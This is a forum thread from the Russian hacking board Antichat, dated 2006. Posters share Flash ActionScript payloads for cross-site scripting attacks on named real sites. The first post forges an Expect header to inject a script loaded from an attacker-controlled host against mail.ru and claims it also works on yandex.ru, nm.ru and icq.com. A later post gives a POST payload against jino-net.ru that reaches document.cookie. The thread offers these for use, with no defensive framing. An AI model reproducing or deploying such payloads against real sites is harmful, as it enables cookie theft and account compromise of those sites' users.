ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Xss на mail.ru через expect заголовок.
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Xss на mail.ru через expect заголовок.
  #1  
Старый 16.10.2006, 19:56
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию Xss на mail.ru через expect заголовок.
Для проведения атаки я буду использовать Flash (ActionScript). Ну и естественно нам понадобится программа для создания Flash и у меня это будет Macromedia Flash MX.
Создание Flash:



PHP код:
var req:LoadVars=new LoadVars(); 
req.addRequestHeader("Expect","<script src=http://yourhost/xss.js></script>"); 
req.decode("XSS"); 
req.send("http://www.mail.ru","POST"); 
Этот ActionScript работает на IE и Firefox, в Opera просто открывается mail.ru.

Уменьшаем размер и экспортируем Flash: File->Export->Export Image.





Вот в принципе и все. Думаю вы знаете что дальше делать.

P.S. Еще работает на yandex.ru, nm.ru и icq.com.
__________________

Завтра будет.Лучше.
Последний раз редактировалось Go0o$E; 16.10.2006 в 20:38..
 
Ответить с цитированием

  #2  
Старый 16.10.2006, 21:10
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию
гыгыгы опера пелеплюнула фаерворкс =) А так метод уже рассматривался и я удивлен, почему же так редко упоминается, ведь пока что тема реально работает. оч рад +
 
Ответить с цитированием

  #3  
Старый 16.10.2006, 21:22
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию
Да уязвимость не нова, но работает еще много где! =)
__________________

Завтра будет.Лучше.
 
Ответить с цитированием

Post Xss на jino-net.ru
  #4  
Старый 20.10.2006, 23:30
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию Post Xss на jino-net.ru
Так же на actionscript можно проводить xss через post запросы.

Пример: XSS на jino-net.ru

PHP код:
var req:LoadVars=new LoadVars();  
req.decode("subject=spam&name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=&message="); 
req.send("http://www.jino-net.ru/contacts.phtml?subj=spam","POST"); 
__________________

Завтра будет.Лучше.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss на mail.ru em00s7 E-Mail 14 08.06.2006 00:38
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Broken image, при использовании XSS через аватару Qwazar PHP, PERL, MySQL, JavaScript 8 15.04.2006 09:02
Взлом сервера Microsoft IIS 6 Через SQL Запросы [Tsh] *CorPSe* АнтиАдмин 3 08.03.2005 12:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ